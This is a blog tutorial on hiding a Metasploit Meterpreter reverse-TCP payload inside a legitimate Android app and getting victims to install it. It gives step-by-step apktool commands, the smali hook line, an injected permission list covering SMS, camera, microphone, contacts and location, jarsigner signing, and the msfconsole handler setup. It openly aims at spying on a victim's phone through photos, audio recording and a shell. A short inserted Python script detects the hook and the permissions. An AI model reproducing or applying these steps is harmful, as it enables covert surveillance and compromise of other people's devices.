Hacking Android With Metasploit!

We discussed how to create a Metasploit payload and how to configure your Linux box with a NoIP account for DDNS in the first part of this series.

In this second and final part we will hook up the Metasploit handler and embed the payload inside an Android app (any app you like, such as Facebook, Gmail or a game).

For that we require:

  • APKTOOL, the Android reverse engineering tool

You can install apktool easily by typing this command in a terminal (apktool ships with Kali Linux):

sudo apt-get install apktool

  • Jarsigner, for digitally signing Android apps with fake certificates

Download the necessary files for jarsigner from our GitHub repository:
OneClicksigner

So now all we have to do is:

1. Generate the Meterpreter payload

2. Decompile the payload and the original apk

3. Copy the payload files to the original apk

4. Inject the hook into the appropriate activity of the original apk

5. Inject the permissions in the AndroidManifest.xml file

6. Re-compile the original apk

7. Sign the apk using Jarsigner

We already finished generating the Metasploit payload in the last part.

So we'll continue with the

Second step

Decompiling the payload and the APK file in which you want to place your payload:

The apktool decompile commands are as follows:

apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk

After this process completes there will be two folders under /root: one contains the files of the msf payload and the other those of the original apk to which the payload is to be bound.

Third step

Copying the files from the payload apk to the original apk:

Open the AndroidManifest.xml file located inside the "/root/original" folder using any text editor.

If you know HTML, this file will look familiar to you. Both are markup languages, and both use the familiar tag-and-attribute structure, e.g. <tag attribute="value"> Content </tag>. Look for an <activity> tag which contains both of the lines below:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

Step four

Inject the hook into the appropriate activity of the original apk

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note the value of its "android:name" attribute.

The two lines we searched for signify that this is the activity which starts when the app is launched from the launcher icon; it is the MAIN activity, similar to the 'main' function in traditional programming.

Now that we have the name of the activity we want to inject the hook into, let's get to it! First, open the .smali code of that activity in a text editor. Open a terminal and type:

gedit /root/original/smali/Activity_Path

Replace Activity_Path with the activity's "android:name", but with slashes instead of dots. The smali code is stored in folders named in the same format as "android:name", so the location of the .smali file follows directly from it.

Then search for the following line in the smali code using CTRL+F:

;->onCreate(Landroid/os/Bundle;)V

When you find it, change the entire line to this:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

When the main activity executes this line, the app starts its main activity together with the Metasploit payload.

So we get the meterpreter shell in our console.

Step five

Inject the permissions in the AndroidManifest.xml file

Now we are all set, but we still have to grant the necessary (or additional) permissions to get full control over the Android device; for that we have to edit the AndroidManifest.xml file. The XML file looks like HTML, so it is easy to edit.

Copy this text and place it in the manifest after the existing <permission> tags, without creating duplicate lines:

<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.DEVICE_POWER"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="android.permission.STATUS_BAR"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="com.android.vending.BILLING"/>
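From the defender's side, the two artifacts that step four and step five leave behind (the invoke-static call into Lcom/metasploit/stage/Payload; in the launcher activity's smali, and an unusually broad or duplicated permission list in the manifest) are exactly what a triage script looks for in a decompiled APK. The following is an added example, not code from the original post; the smali and manifest snippets are constructed, and the SENSITIVE set is an assumption picked from the list above.

```python
import re
# Hook signature that step four injects into the launcher activity's smali.
HOOK_RE = re.compile(r"invoke-static\s*\{[^}]*\},\s*Lcom/metasploit/stage/Payload;->start\(")
PERM_RE = re.compile(r'<uses-permission\s+android:name="([^"]+)"')
# Permissions from the step-five list that a benign app rarely requests together.
# This set is an assumption for the example, not an Android or Metasploit constant.
SENSITIVE = {
    "android.permission.SEND_SMS", "android.permission.READ_SMS",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.READ_CONTACTS", "android.permission.CALL_PHONE",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_LOGS",
}

def find_hooks(smali_text):
    """1-based line numbers in a smali file where the metasploit stage is started."""
    return [n for n, line in enumerate(smali_text.splitlines(), 1) if HOOK_RE.search(line)]

def manifest_permissions(manifest_text):
    """Requested permission names plus any duplicated ones (a sign of sloppy injection)."""
    perms = PERM_RE.findall(manifest_text)
    return perms, sorted({p for p in perms if perms.count(p) > 1})

def triage(smali_text, manifest_text, threshold=4):
    """Flag an unpacked APK when the hook is present or too many sensitive perms appear."""
    hooks = find_hooks(smali_text)
    perms, dups = manifest_permissions(manifest_text)
    sensitive = sorted(set(perms) & SENSITIVE)
    return {"hook_lines": hooks, "sensitive": sensitive, "duplicates": dups,
            "suspicious": bool(hooks) or len(sensitive) >= threshold}

# Constructed sample: a launcher activity's onCreate after the hook was added.
SAMPLE_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 0
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method
"""
# Constructed sample manifest fragment with one duplicated entry.
SAMPLE_MANIFEST = """<manifest>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
</manifest>
"""
if __name__ == "__main__":
    print(triage(SAMPLE_SMALI, SAMPLE_MANIFEST))  # suspicious: hook on line 4, 4 sensitive perms
```

Pointing find_hooks at every .smali file under a decompiled tree and manifest_permissions at its AndroidManifest.xml turns this into a quick scan for the specific modifications this post describes.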

Step six

Re-compile the original apk

After saving the XML file we have to re-compile the folder so the payload gets embedded in the .apk file.

apktool b /root/original

Now the original apk file is ready!

Step seven

Sign the apk using Jarsigner

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority; Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default Android debug key. Just run the following command:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

The keystore file and all the other necessary files are in the oncliksign.zip file; please download it from the following links:

Download Link1

Download Link2

Now if you can get the victim to install and run this very legit-looking app on his phone, you get a working meterpreter session on it!

Just open your console and type:

->msfconsole
->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444
->exploit

When specifying PAYLOAD, check that it matches what you gave when creating the payload; it must be the same. To get the meterpreter session, port 4444 must be port forwarded from your router/modem.

To do this go to the gateway or home page of your router (example: 192.168.1.1/home.html).

There you'll find the Virtual Server or Port Forwarding option; set all TCP port forwarding active there.

If you use the internet from an Android mobile hotspot, please download a port forwarding app available on the Play Store.

The profit from this tool is:

When the victim installs the app on his phone you get a meterpreter session opened, and you can perform many operations with it, like taking photos, recording voice, check_root, etc.

Just type help when you get the meterpreter session; the available operations will be listed!

I hope this Metasploit series on hacking Android phones is helpful. 🙂

If you have any queries please write in the comments section; we'll take care of it.

Thank you!

Lanwil DS (Team HR)
